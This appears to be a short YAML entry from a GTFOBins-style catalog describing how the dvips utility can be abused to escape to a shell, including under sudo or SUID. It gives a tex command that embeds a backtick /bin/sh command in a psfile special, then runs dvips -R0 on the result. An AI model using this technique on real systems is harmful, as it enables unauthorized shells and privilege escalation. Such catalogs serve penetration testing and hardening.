Files

18 lines
336 B
Plaintext

---
functions:
shell:
- code: |-
dvips -R0 texput.dvi
comment: |-
The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
```
tex '\special{psfile="`/bin/sh 1>&0"}\end'
```
contexts:
sudo:
suid:
shell: true
unprivileged:
...